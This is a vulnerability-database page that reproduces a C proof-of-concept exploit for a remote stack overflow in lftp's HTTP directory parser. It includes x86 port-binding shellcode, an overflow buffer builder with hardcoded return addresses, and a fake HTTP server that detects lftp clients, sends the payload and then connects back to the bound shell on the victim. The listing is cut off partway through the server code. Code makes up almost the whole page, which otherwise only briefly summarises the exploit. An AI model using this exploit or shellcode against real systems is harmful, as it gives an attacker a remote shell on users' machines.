Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

lftp <= 2.6.9 Remote Stack based Overflow Exploit

🗓️ 05 Jun 2008 00:00:00Reported by RootType 
seebug
 seebug🔗 www.seebug.org👁 26 Views

lftp <= 2.6.9 Remote Stack based Overflow Exploit by Li0n7. It demonstrates the exploitation of the vulnerable function try_netscape_proxy() in lftp versions later than 2.6.10

Code

                                                /*
&nbsp;*&nbsp;lftp&nbsp;remote&nbsp;stack-based&nbsp;overflow&nbsp;exploit&nbsp;by&nbsp;Li0n7&nbsp;voila&nbsp;fr
&nbsp;*
&nbsp;*&nbsp;Vulnerability&nbsp;discovered&nbsp;by&nbsp;Ulf&nbsp;Harnhammar&nbsp;Ulf.Harnhammar.9485&nbsp;student&nbsp;uu&nbsp;se
&nbsp;*
&nbsp;*&nbsp;Lftp&nbsp;versions&nbsp;later&nbsp;than&nbsp;2.6.10&nbsp;are&nbsp;prone&nbsp;to&nbsp;a&nbsp;remotly&nbsp;exploitable&nbsp;stack-based
&nbsp;*&nbsp;overflow&nbsp;in&nbsp;try_netscape_proxy()&nbsp;and&nbsp;try_squid_eplf(&nbsp;(src/HttpDir.cc).&nbsp;This
&nbsp;*&nbsp;bad&nbsp;coded&nbsp;proof-of-concept&nbsp;demonstrates&nbsp;the&nbsp;exploitation&nbsp;by&nbsp;exploiting&nbsp;the
&nbsp;*&nbsp;vulnerable&nbsp;function&nbsp;try_netscape_proxy()&nbsp;(HttpDir.cc:358)&nbsp;and&nbsp;it&nbsp;needs&nbsp;more&nbsp;targets
&nbsp;*&nbsp;to&nbsp;be&nbsp;efficient.&nbsp;Please&nbsp;note&nbsp;that&nbsp;this&nbsp;vulnerability&nbsp;is&nbsp;really&nbsp;hard&nbsp;to&nbsp;exploit
&nbsp;*&nbsp;since&nbsp;lots&nbsp;of&nbsp;parameters&nbsp;come&nbsp;into&nbsp;play&nbsp;and&nbsp;are&nbsp;different&nbsp;from&nbsp;a&nbsp;platform&nbsp;to&nbsp;another,
&nbsp;*&nbsp;for&nbsp;we&nbsp;have&nbsp;to&nbsp;overwrite&nbsp;some&nbsp;variables&nbsp;and&nbsp;registers&nbsp;before&nbsp;overwriting&nbsp;eip.
&nbsp;*&nbsp;With&nbsp;some&nbsp;time&nbsp;and&nbsp;lot&nbsp;of&nbsp;patience,&nbsp;you&nbsp;should&nbsp;find&nbsp;your&nbsp;own&nbsp;parameters&nbsp;by&nbsp;using
&nbsp;*&nbsp;GDB.&nbsp;Params&nbsp;to&nbsp;edit&nbsp;are&nbsp;marked&nbsp;with&nbsp;a&nbsp;\'!\'&nbsp;in&nbsp;the&nbsp;POC&nbsp;code.&nbsp;Moreover,&nbsp;I&nbsp;have&nbsp;edited
&nbsp;*&nbsp;Bighawk\'s&nbsp;port&nbsp;binding&nbsp;shellcode&nbsp;not&nbsp;to&nbsp;contain&nbsp;any&nbsp;white&nbsp;character&nbsp;such&nbsp;as&nbsp;\\r,\\t,\\v,
&nbsp;*&nbsp;\\f,\\n&nbsp;or&nbsp;\\20&nbsp;because&nbsp;we&nbsp;are&nbsp;exploiting&nbsp;a&nbsp;sscanf&nbsp;function.
&nbsp;*
&nbsp;*&nbsp;usage:&nbsp;./lftp-exp&nbsp;[-f&nbsp;<path>][-p&nbsp;<port>][-r&nbsp;<ret>][-t&nbsp;<target>]
&nbsp;*&nbsp;-f&nbsp;<path>:&nbsp;create&nbsp;<path>index.html
&nbsp;*&nbsp;-p&nbsp;<port>:&nbsp;run&nbsp;a&nbsp;fake&nbsp;lftp&nbsp;server&nbsp;on&nbsp;port&nbsp;<port>&nbsp;(default:&nbsp;80)
&nbsp;*&nbsp;-r&nbsp;<ret>:&nbsp;return&nbsp;address&nbsp;you&nbsp;would&nbsp;like&nbsp;to&nbsp;use
&nbsp;*&nbsp;-t&nbsp;<target>:&nbsp;choose&nbsp;the&nbsp;target&nbsp;among&nbsp;the&nbsp;platforms&nbsp;available
&nbsp;*&nbsp;Platforms&nbsp;supported&nbsp;are:
&nbsp;*&nbsp;num:&nbsp;0&nbsp;-&nbsp;slack&nbsp;9.0&nbsp;-&nbsp;0xbffff770
&nbsp;*
&nbsp;*&nbsp;For&nbsp;instance:&nbsp;./lftp-exp&nbsp;-p&nbsp;80&nbsp;-t&nbsp;0
&nbsp;*&nbsp;./lftp-exp&nbsp;-f&nbsp;/&nbsp;-t&nbsp;0
&nbsp;*
&nbsp;*&nbsp;A&nbsp;poil&nbsp;!
&nbsp;*/

#include&nbsp;<stdio.h>
#include&nbsp;<unistd.h>
#include&nbsp;<netdb.h>
#include&nbsp;<netinet/in.h>
#include&nbsp;<errno.h>
#include&nbsp;<fcntl.h>
#include&nbsp;<unistd.h>

#define&nbsp;BUFFERSIZE&nbsp;117&nbsp;/*!*/
#define&nbsp;SIZE&nbsp;256

#define&nbsp;D_BACK&nbsp;26112
#define&nbsp;D_RET&nbsp;0xbffff770
#define&nbsp;D_PORT&nbsp;80

#define&nbsp;DUMMY1&nbsp;0xbffff140&nbsp;/*!*/
#define&nbsp;DUMMY2&nbsp;0xbffff810&nbsp;/*!*/

#define&nbsp;OK&nbsp;\"cd&nbsp;ok,&nbsp;cwd=/\\n\"


/*&nbsp;Edited&nbsp;bighawk&nbsp;78&nbsp;bytes&nbsp;portbinding&nbsp;shellcode&nbsp;*/
/*&nbsp;size:&nbsp;80&nbsp;bytes&nbsp;*/
/*&nbsp;Does&nbsp;not&nbsp;contain&nbsp;any&nbsp;white&nbsp;character&nbsp;i.e&nbsp;\\r,\\t,\\v,\\f,\\n,\\20&nbsp;*/

char&nbsp;shellcode[]&nbsp;=
\"\\x31\\xdb\\xf7\\xe3\\x53\\x43\\x53\\x6a\\x02\\x89\\xe1\\xb0\"
\"\\x66\\x52\\x50\\xcd\\x80\\x43\\x66\\x53\\x89\\xe1\\x6a\\x10\"
\"\\x51\\x50\\x89\\xe1\\x52\\x50\\xb0\\x66\\xcd\\x80\\x89\\xe1\"
\"\\xb3\\x04\\xb0\\x66\\xcd\\x80\\x43\\xb0\\x66\\xcd\\x80\\x89\"
\"\\xd9\\x93\\xb0\\x3f\\xcd\\x80\\x49\\x79\\xf9\\x52\\x68\\x6e\"
\"\\x2f\\x73\\x68\\x68\\x2f\\x2f\\x62\\x69\\x89\\xe3\\x52\\x53\"
\"\\x89\\xe1\\xb0\\x28\\x2c\\x1d\\xcd\\x80\";

char&nbsp;badc0ded[]&nbsp;=
{0x20,0x09,0x0a,0x0b,0x0c,0x0d,0x00};

char&nbsp;*lftp_versions[]&nbsp;=
{
&nbsp;&nbsp;\"lftp/2.3\",
&nbsp;&nbsp;\"lftp/2.4.9\",
&nbsp;&nbsp;\"lftp/2.5.2\",
&nbsp;&nbsp;\"lftp/2.6.0\",
&nbsp;&nbsp;\"lftp/2.6.3\",
&nbsp;&nbsp;\"lftp/2.6.4\",
&nbsp;&nbsp;\"lftp/2.6.5\",
&nbsp;&nbsp;\"lftp/2.6.6\",
&nbsp;&nbsp;\"lftp/2.6.7\",
&nbsp;&nbsp;\"lftp/2.6.8\",
&nbsp;&nbsp;\"lftp/2.6.9\",
&nbsp;&nbsp;&nbsp;
};

unsigned&nbsp;long&nbsp;ret_addr&nbsp;=&nbsp;D_RET;

int&nbsp;back_connection(long&nbsp;host);
int&nbsp;check_shellcode(char&nbsp;*host);
void&nbsp;check_version();
char&nbsp;*&nbsp;build(char&nbsp;*host);
int&nbsp;create_file(char&nbsp;*path);
void&nbsp;wait_connection(int&nbsp;port);
long&nbsp;resolve_host(u_char&nbsp;*host_name);
void&nbsp;die(char&nbsp;*argv);

struct&nbsp;os_ret_addr
{
&nbsp;&nbsp;int&nbsp;num;
&nbsp;&nbsp;char&nbsp;*plat;
&nbsp;&nbsp;long&nbsp;ret;
};

struct&nbsp;os_ret_addr&nbsp;exp_os[]=
{
&nbsp;&nbsp;{0,\"slack&nbsp;9.0\",0xbffff770},
&nbsp;&nbsp;{0,NULL,0}
};


int
main(int&nbsp;argc,char&nbsp;*argv[])
{
&nbsp;&nbsp;int&nbsp;i,&nbsp;option,&nbsp;port&nbsp;=&nbsp;D_PORT;
&nbsp;&nbsp;long&nbsp;host&nbsp;=&nbsp;0;
&nbsp;&nbsp;char&nbsp;*&nbsp;option_list&nbsp;=&nbsp;\"f:p:r:t:\",&nbsp;path[128];

&nbsp;&nbsp;opterr&nbsp;=&nbsp;0;

&nbsp;&nbsp;if&nbsp;(argc&nbsp;<&nbsp;2)&nbsp;die(argv[0]);
&nbsp;&nbsp;while((option&nbsp;=&nbsp;getopt(argc,argv,option_list))&nbsp;!=&nbsp;-1)
&nbsp;&nbsp;&nbsp;&nbsp;switch(option)
&nbsp;&nbsp;&nbsp;&nbsp;{
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;case&nbsp;\'f\':
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;strncpy(path,optarg,sizeof(path)-1);
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;path[sizeof(path)-1]&nbsp;=&nbsp;\'\\0\';
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;create_file(path);
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;return&nbsp;0;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;case&nbsp;\'p\':
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;port&nbsp;=&nbsp;atoi(optarg);
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if(port&nbsp;>&nbsp;65535&nbsp;||&nbsp;port&nbsp;<&nbsp;0)&nbsp;exit(-1);
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;break;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;case&nbsp;\'r\':
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;ret_addr&nbsp;=&nbsp;atol(optarg);
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if(ret_addr&nbsp;>&nbsp;0xbfffffff&nbsp;||&nbsp;ret_addr&nbsp;<&nbsp;0x00000000)&nbsp;exit(1);
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;break;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;case&nbsp;\'t\':
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;for(i=0;&nbsp;exp_os[i].plat&nbsp;!=&nbsp;NULL;&nbsp;i++)
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if(atoi(optarg)&nbsp;>&nbsp;i&nbsp;||&nbsp;atoi(optarg)&nbsp;<&nbsp;0)
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;{
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;fprintf(stderr,\"&nbsp;Platforms&nbsp;supported&nbsp;are:\\n\");
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;for(i=0;&nbsp;exp_os[i].plat&nbsp;!=&nbsp;NULL;&nbsp;i++)
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;fprintf(stderr,\"&nbsp;num:&nbsp;%i&nbsp;-&nbsp;%s&nbsp;-&nbsp;0x%x\\n\",i,exp_os[i].plat,exp_os[i].ret);
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;exit(1);
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;ret_addr&nbsp;=&nbsp;exp_os[atoi(optarg)].ret;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;break;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;case&nbsp;\'?\':
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;fprintf(stderr,\"[-]&nbsp;option&nbsp;\\\'%c\\\'&nbsp;invalid\\n\",optopt);
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;die(argv[0]);
&nbsp;&nbsp;&nbsp;&nbsp;}
&nbsp;
&nbsp;&nbsp;wait_connection(port);
&nbsp;&nbsp;return&nbsp;0;
}


int
check_shellcode(char&nbsp;*host)
{
&nbsp;&nbsp;int&nbsp;i,j;
&nbsp;&nbsp;for(i=0;i<strlen(shellcode);i++)
&nbsp;&nbsp;&nbsp;&nbsp;for(j=0;j<strlen(badc0ded);j++)
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if(shellcode[i]&nbsp;==&nbsp;badc0ded[j])
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;{
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;fprintf(stderr,\"[%s]&nbsp;badc0ded&nbsp;shellcode!\\n\",host);
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;return&nbsp;-1;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}
&nbsp;&nbsp;return&nbsp;0;
}


void
check_version(char&nbsp;*version)
{
&nbsp;&nbsp;int&nbsp;i;
&nbsp;&nbsp;for(i=0;i<sizeof(lftp_versions);i++)
&nbsp;&nbsp;&nbsp;&nbsp;if(!strcmp(lftp_versions[i],version))
&nbsp;&nbsp;&nbsp;&nbsp;{
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;fprintf(stdout,\"(vulnerable).\\n\");
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;return;
&nbsp;&nbsp;&nbsp;&nbsp;}
&nbsp;&nbsp;fprintf(stdout,\"(not&nbsp;vulnerable).\\n\");
&nbsp;&nbsp;return;
}


char
*build(char&nbsp;*host)
{
&nbsp;&nbsp;char&nbsp;*buffer,*ptr;
&nbsp;&nbsp;int&nbsp;i;
&nbsp;&nbsp;unsigned&nbsp;long&nbsp;*addr_ptr;

&nbsp;&nbsp;fprintf(stdout,\"[%s]&nbsp;Building&nbsp;evil&nbsp;string&nbsp;to&nbsp;send&nbsp;(using&nbsp;ret&nbsp;0x%x)...\\n\",host,ret_addr);

&nbsp;&nbsp;buffer&nbsp;=&nbsp;(char&nbsp;*)malloc(SIZE+1);

&nbsp;&nbsp;if(!buffer)
&nbsp;&nbsp;{
&nbsp;&nbsp;&nbsp;&nbsp;fprintf(stderr,\"[-]&nbsp;Can\'t&nbsp;allocate&nbsp;memory,exiting...\\n\");
&nbsp;&nbsp;&nbsp;&nbsp;exit(1);
&nbsp;&nbsp;}

&nbsp;&nbsp;ptr&nbsp;=&nbsp;buffer;
&nbsp;&nbsp;memset(ptr,0x90,BUFFERSIZE-strlen(shellcode));
&nbsp;&nbsp;ptr&nbsp;+=&nbsp;BUFFERSIZE-strlen(shellcode);

&nbsp;&nbsp;if((i&nbsp;=&nbsp;check_shellcode(host))&nbsp;<&nbsp;0)&nbsp;exit(1);

&nbsp;&nbsp;for(i=0;i<strlen(shellcode);i++)
&nbsp;&nbsp;&nbsp;&nbsp;*ptr++&nbsp;=&nbsp;shellcode[i];

&nbsp;&nbsp;/*&nbsp;You&nbsp;might&nbsp;need&nbsp;to&nbsp;modify&nbsp;the&nbsp;padding&nbsp;too&nbsp;*/
&nbsp;&nbsp;addr_ptr&nbsp;=&nbsp;(long&nbsp;*)ptr;
&nbsp;&nbsp;for(i=0;i<24;i++)
&nbsp;&nbsp;&nbsp;*(addr_ptr++)&nbsp;=&nbsp;DUMMY1;
&nbsp;&nbsp;for(i=0;i<8;i++)
&nbsp;&nbsp;&nbsp;*(addr_ptr++)&nbsp;=&nbsp;DUMMY2;
&nbsp;&nbsp;*(addr_ptr++)&nbsp;=&nbsp;ret_addr;&nbsp;/*&nbsp;EIP&nbsp;*/
&nbsp;&nbsp;*(addr_ptr++)&nbsp;=&nbsp;DUMMY2;

&nbsp;&nbsp;ptr&nbsp;=&nbsp;(char&nbsp;*)addr_ptr;
&nbsp;&nbsp;*ptr&nbsp;=&nbsp;0x0;
&nbsp;&nbsp;return&nbsp;buffer;
}


int
create_file(char&nbsp;*path)
{
&nbsp;&nbsp;int&nbsp;fd;
&nbsp;&nbsp;char&nbsp;buffer[512],&nbsp;file[256];
&nbsp;&nbsp;ssize_t&nbsp;written;

&nbsp;&nbsp;memset(file,0,256);
&nbsp;&nbsp;memset(buffer,0,512);

&nbsp;&nbsp;strcat(file,path);
&nbsp;&nbsp;strcat(file,\"index.html\");

&nbsp;&nbsp;fd&nbsp;=&nbsp;open(file,O_WRONLY&nbsp;|&nbsp;O_CREAT&nbsp;|&nbsp;O_TRUNC,0644);
&nbsp;&nbsp;if(fd&nbsp;<&nbsp;0)
&nbsp;&nbsp;{
&nbsp;&nbsp;&nbsp;&nbsp;fprintf(stderr,\"[-]&nbsp;%s\\n\",strerror(errno));
&nbsp;&nbsp;&nbsp;&nbsp;exit(0);
&nbsp;&nbsp;}
&nbsp;&nbsp;snprintf(buffer,512,\"<a&nbsp;href=\\\"/\\\">empty</a>&nbsp;Fri&nbsp;May&nbsp;30&nbsp;10:09:06&nbsp;2001&nbsp;%s\\n\",build(\"+\"));
&nbsp;&nbsp;written&nbsp;=&nbsp;write(fd,buffer,512);
&nbsp;&nbsp;if(written&nbsp;!=&nbsp;512)
&nbsp;&nbsp;{
&nbsp;&nbsp;&nbsp;&nbsp;fprintf(stderr,\"[-]&nbsp;%s\\n\",strerror(errno));
&nbsp;&nbsp;&nbsp;&nbsp;exit(0);
&nbsp;&nbsp;}
&nbsp;&nbsp;close(fd);
&nbsp;&nbsp;fprintf(stdout,\"[+]&nbsp;File&nbsp;%s&nbsp;successfuly&nbsp;created.\\n\",file);
&nbsp;&nbsp;return&nbsp;0;
}


int
back_connection(long&nbsp;host)
{
&nbsp;&nbsp;struct&nbsp;sockaddr_in&nbsp;s;
&nbsp;&nbsp;u_char&nbsp;sock_buf[4096];
&nbsp;&nbsp;fd_set&nbsp;fds;
&nbsp;&nbsp;int&nbsp;fd,size;
&nbsp;&nbsp;char&nbsp;*command=\"/bin/uname&nbsp;-a&nbsp;;&nbsp;/usr/bin/id;\\n\";

&nbsp;&nbsp;fd&nbsp;=&nbsp;socket(AF_INET,&nbsp;SOCK_STREAM,&nbsp;0);
&nbsp;&nbsp;if&nbsp;(fd&nbsp;<&nbsp;0)
&nbsp;&nbsp;{
&nbsp;&nbsp;&nbsp;&nbsp;fprintf(stderr,\"[-]&nbsp;%s\\n\",strerror(errno));
&nbsp;&nbsp;&nbsp;&nbsp;exit(1);
&nbsp;&nbsp;}

&nbsp;&nbsp;s.sin_family&nbsp;=&nbsp;AF_INET;
&nbsp;&nbsp;s.sin_port&nbsp;=&nbsp;htons(D_BACK);
&nbsp;&nbsp;s.sin_addr.s_addr&nbsp;=&nbsp;host;

&nbsp;&nbsp;if&nbsp;(connect(fd,&nbsp;(struct&nbsp;sockaddr&nbsp;*)&s,&nbsp;sizeof(struct&nbsp;sockaddr))&nbsp;==&nbsp;-1)
&nbsp;&nbsp;{
&nbsp;&nbsp;&nbsp;&nbsp;fprintf(stderr,\"[-]&nbsp;%s\\n\",strerror(errno));
&nbsp;&nbsp;&nbsp;&nbsp;close(fd);
&nbsp;&nbsp;&nbsp;&nbsp;return&nbsp;0;
&nbsp;&nbsp;}

&nbsp;&nbsp;fprintf(stdout,&nbsp;\"[+]&nbsp;Let\'s&nbsp;rock&nbsp;on!\\n\");

&nbsp;&nbsp;size&nbsp;=&nbsp;send(fd,&nbsp;command,&nbsp;strlen(command),&nbsp;0);
&nbsp;&nbsp;if(size&nbsp;<&nbsp;0)
&nbsp;&nbsp;{
&nbsp;&nbsp;&nbsp;&nbsp;fprintf(stderr,\"[-]&nbsp;%s\\n\",strerror(errno));
&nbsp;&nbsp;&nbsp;&nbsp;close(fd);
&nbsp;&nbsp;&nbsp;&nbsp;exit(1);
&nbsp;&nbsp;}

&nbsp;&nbsp;for&nbsp;(;;)
&nbsp;&nbsp;{
&nbsp;&nbsp;&nbsp;&nbsp;FD_ZERO(&fds);
&nbsp;&nbsp;&nbsp;&nbsp;FD_SET(0,&nbsp;&fds);
&nbsp;&nbsp;&nbsp;&nbsp;FD_SET(fd,&nbsp;&fds);

&nbsp;&nbsp;&nbsp;&nbsp;if&nbsp;(select(255,&nbsp;&fds,&nbsp;NULL,&nbsp;NULL,&nbsp;NULL)&nbsp;==&nbsp;-1)
&nbsp;&nbsp;&nbsp;&nbsp;{
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;fprintf(stderr,\"[-]&nbsp;%s\\n\",strerror(errno));
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;close(fd);
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;exit(1);
&nbsp;&nbsp;&nbsp;&nbsp;}

&nbsp;&nbsp;&nbsp;&nbsp;memset(sock_buf,&nbsp;0,&nbsp;sizeof(sock_buf));

&nbsp;&nbsp;&nbsp;&nbsp;if&nbsp;(FD_ISSET(fd,&nbsp;&fds))
&nbsp;&nbsp;&nbsp;&nbsp;{
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if&nbsp;(recv(fd,&nbsp;sock_buf,&nbsp;sizeof(sock_buf),&nbsp;0)&nbsp;==&nbsp;-1)
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;{
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;fprintf(stderr,&nbsp;\"[-]&nbsp;Connection&nbsp;closed&nbsp;by&nbsp;remote&nbsp;host,exiting...\\n\");
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;close(fd);
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;exit(1);
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}

&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;fprintf(stderr,&nbsp;\"%s\",&nbsp;sock_buf);
&nbsp;&nbsp;&nbsp;&nbsp;}

&nbsp;&nbsp;&nbsp;&nbsp;if&nbsp;(FD_ISSET(0,&nbsp;&fds))
&nbsp;&nbsp;&nbsp;&nbsp;{
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;read(0,&nbsp;sock_buf,&nbsp;sizeof(sock_buf));
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;write(fd,&nbsp;sock_buf,&nbsp;strlen(sock_buf));
&nbsp;&nbsp;&nbsp;&nbsp;}
&nbsp;&nbsp;}
&nbsp;&nbsp;return&nbsp;0;
}


void
wait_connection(int&nbsp;port)
{
&nbsp;&nbsp;struct&nbsp;sockaddr_in&nbsp;s;
&nbsp;&nbsp;int&nbsp;size,&nbsp;fd,&nbsp;fd2,&nbsp;i,&nbsp;r,&nbsp;cancel&nbsp;=&nbsp;0;
&nbsp;&nbsp;char&nbsp;data[1024],&nbsp;version[32],&nbsp;request[512];
&nbsp;&nbsp;char&nbsp;*ptr;
&nbsp;&nbsp;long&nbsp;host&nbsp;=&nbsp;0;

&nbsp;&nbsp;memset(data,0,1024);

&nbsp;&nbsp;fprintf(stdout,\"[+]&nbsp;Setting&nbsp;up&nbsp;a&nbsp;fake&nbsp;HTTP&nbsp;server...\\n\");
&nbsp;
&nbsp;&nbsp;fd&nbsp;=&nbsp;socket(AF_INET,SOCK_STREAM,0);
&nbsp;&nbsp;if(fd&nbsp;<&nbsp;0)
&nbsp;&nbsp;{
&nbsp;&nbsp;&nbsp;&nbsp;fprintf(stderr,\"[-]&nbsp;%s\\n\",strerror(errno));
&nbsp;&nbsp;&nbsp;&nbsp;exit(1);
&nbsp;&nbsp;}

&nbsp;&nbsp;s.sin_family&nbsp;=&nbsp;AF_INET;
&nbsp;&nbsp;s.sin_port&nbsp;=&nbsp;htons(port);
&nbsp;&nbsp;s.sin_addr.s_addr&nbsp;=&nbsp;0;

&nbsp;&nbsp;bind(fd,(struct&nbsp;sockaddr&nbsp;*)&nbsp;&s,sizeof(s));
&nbsp;&nbsp;listen(fd,1);
&nbsp;&nbsp;size&nbsp;=&nbsp;sizeof(s);
&nbsp;&nbsp;
&nbsp;&nbsp;fprintf(stdout,\"[+]&nbsp;Awaiting&nbsp;connection&nbsp;on&nbsp;port&nbsp;%i\\n\",port);

&nbsp;&nbsp;while(1)
&nbsp;&nbsp;{
&nbsp;&nbsp;&nbsp;&nbsp;cancel&nbsp;=&nbsp;0;
&nbsp;&nbsp;&nbsp;&nbsp;fd2&nbsp;=&nbsp;accept(fd,(struct&nbsp;sockaddr&nbsp;*)&nbsp;&s,&nbsp;&size);

&nbsp;&nbsp;&nbsp;&nbsp;if(!fork())
&nbsp;&nbsp;&nbsp;&nbsp;{
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;close(fd);
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;while(1)
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;{
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;memset(data,0,1024);
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;r&nbsp;=&nbsp;read(fd2,data,1024);
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if((ptr&nbsp;=&nbsp;strstr(data,\"User-Agent:&nbsp;lftp\"))&nbsp;!=&nbsp;NULL)
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;{
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if(strstr(data,\"HEAD\"))
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;{
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;fprintf(stdout,\"[%s]&nbsp;HEAD&nbsp;request&nbsp;received.\\n\",inet_ntoa(s.sin_addr));
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;size&nbsp;=&nbsp;send(fd2,&nbsp;OK,&nbsp;strlen(OK),&nbsp;0);
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if(size&nbsp;<&nbsp;0)
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;{
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;fprintf(stderr,\"[-]&nbsp;%s\\n\",strerror(errno));
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;close(fd2);
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;exit(1);
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if(strstr(data,\"GET\"))
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;{
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;memset(request,0,512);
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;memset(version,0,32);

&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;strncpy(version,ptr+12,10);
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;version[sizeof(version)-1]&nbsp;=&nbsp;\'\\0\';

&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;fprintf(stdout,\"[%s]&nbsp;GET&nbsp;request&nbsp;received.\\n\",inet_ntoa(s.sin_addr));
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;fprintf(stdout,\"[%s]&nbsp;Remote&nbsp;version&nbsp;of&nbsp;lftp:&nbsp;%s&nbsp;\",inet_ntoa(s.sin_addr),version);
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;check_version(version);

&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;snprintf(request,512,\"HTTP/1.1&nbsp;200&nbsp;OK\\n\"
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;\"Server:&nbsp;thttpd/2.21&nbsp;20apr2001\\n\"
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;\"Content-Type:&nbsp;text/html\\n\"
